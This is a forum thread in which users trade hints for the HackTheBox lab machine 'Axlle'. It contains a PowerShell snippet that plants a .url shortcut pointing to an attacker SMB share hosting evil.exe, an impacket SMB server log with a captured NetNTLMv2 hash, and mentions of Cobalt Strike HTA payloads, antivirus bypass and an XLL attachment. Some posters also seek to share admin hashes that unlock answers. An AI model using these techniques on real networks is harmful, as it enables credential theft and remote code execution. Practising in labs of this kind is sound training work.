HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
#81
(Jun 23, 2024, 06:32 AM)ritualist Wrote:
(Jun 23, 2024, 05:09 AM)maggi Wrote: anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
Bro i am not able to find the mail you are talking about if i got to C:\Program Files (x86)\hMailserver\Data i can only see axlle.htb

please help me with it
Reply
#82
any hint for get in to dallon.matrix
Reply
#83
guys i got connection in my smb server ! but why it' not working? i tried with hta mechanism and .exe
Reply
#84
guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided
Reply
#85
(Jun 25, 2024, 11:39 AM)cavour13 Wrote: guys i got connection in my smb server ! but why it' not working? i tried with hta mechanism and .exe

i served HTA payload from Cobalt Strike (HTML attack) via smb & it went smoothly as a charm... don't know if AV is even acting on the box. Anyway, my Arsenal Kit bypasses all of it
Reply
#86
(Jun 25, 2024, 05:05 PM)mazafaka555 Wrote:
(Jun 25, 2024, 11:39 AM)cavour13 Wrote: guys i got connection in my smb server ! but why it' not working? i tried with hta mechanism and .exe

i served HTA payload from Cobalt Strike (HTML attack) via smb & it went smoothly as a charm... don't know if AV is even acting on the box. Anyway, my Arsenal Kit bypasses all of it

there is no AV!
Thanks @paw for the rank!!
Reply
#87
(Jun 23, 2024, 10:28 PM)osamy7593 Wrote: i get the password of mssql how to log in the database

How you got the mssql passwd
Reply
#88
Can someone please share administrator Hash to open up this write-up:
https://4xura.com/ctf/htb-writeup-axlle/
Reply
#89
(Jun 26, 2024, 03:03 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 10:44 PM)4rrows Wrote: Use --attach @Shell.xll it will work

this is honestly the biggest thing about the entire machine

i wasted so much time with improper attach arguments

honestly probably couldve blooded it otherwise but im a dumbass so oh well

once you get past that its just standard ctf bullshit

I found out that's because of the issue of the XLL file. Even though it works locally in some cases. 
But it was attached with the local library (2010 Excel SDK), even we did some configuration link to 2013 SDK.
After some reconfiguration it will just become fine to be the completely 64-bit XLL file which is able to be run on the remote machine
Reply
#90
guys how to get out of axlle\gideon.hamill plss i really appreciate that
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,931 6 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,530 6 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,796 7 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,613 11 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,268 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)